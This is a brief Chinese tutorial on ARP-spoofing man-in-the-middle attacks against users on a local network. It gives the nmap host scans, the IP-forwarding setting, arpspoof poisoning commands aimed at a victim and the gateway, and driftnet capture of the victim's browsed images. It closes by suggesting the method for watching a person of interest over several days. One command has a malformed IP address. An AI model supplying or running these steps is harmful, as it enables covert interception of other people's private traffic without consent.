arp欺骗,利用中间人攻击原理,
对内网的用户实施欺骗,从而到达目的。
中间人攻击原理:两边通信的要经过黑客才能把信息转发给对方,
从而导致信息泄露。
实验工具:
kali linux
nmap
arpspoof
driftnet
操作步骤:
1,扫描主机
nmap -sP 192.168.1.1-255
nmap -sS 192.168.1.1-255
2,开启IP转发,
root@kali:~# echo “1” >> /proc/sys/net/ipv4/ip_forward
root@kali:~# cat /proc/sys/net/ipv4/ip_forward
1
3,开始投毒,进行欺骗
arpspoof -i eth0 -t 192.168.1.132 192.168.1.254
arpspoof -i eth 0 -t 1921.68.1.254 192.168.1.132
随便一条命令就行了,就是它们转发给任意一方的包,的要经过kali才能转发
出去
-i 网卡名
-t IP地址和网关
4,打开图片捕获工具driftnet来抓取,
driftnet -i eth0
5,把图放到最大,可以抓取跟多图片,(手机电脑都行,手机抓取的不稳定),要对方用浏览器访问才可以抓取。我打开自己的win10做一下实验。
6,抓取的时候,网络不好可能有影响,抓取的图片鼠标点一下,就自动保存在root目录下
7,个人体验并不好,因为别人上网不一定打开浏览器,找图片,如果说你对一个很感兴趣,到时可以试试,反正你可以抓取很多天有可能的抓不到,